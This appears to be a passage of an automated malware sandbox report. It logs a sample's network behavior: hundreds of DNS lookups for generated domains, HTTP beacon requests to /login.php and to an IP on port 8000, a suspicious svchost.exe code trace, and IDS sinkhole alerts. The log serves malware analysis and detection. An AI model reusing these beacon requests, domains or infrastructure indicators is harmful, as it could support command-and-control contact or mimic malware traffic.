Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyvuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonykuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
Source: unknown; Network traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknown; Network traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknown; Network traffic detected: DNS query count 1005
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_02C83D90 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02C83D90
Source: global traffic; TCP traffic: 192.168.2.6:49759 -> 106.15.232.163:8000
Source: global traffic; DNS traffic detected: number of DNS queries: 1005
Source: Joe Sandbox View; IP Address: 3.94.10.34
Source: Joe Sandbox View; IP Address: 64.190.63.136
Source: Joe Sandbox View; ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.6:49715
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.6:49714
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.6:49720
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.6:49720
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.6:49714
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.6:49715
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.6:53361
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.6:53361
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49809
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:59201
Source: global traffic; HTTP traffic detected:
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0450-397d-84b8-860db74cb63b HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731347439.2338786
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731347439.3564880
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
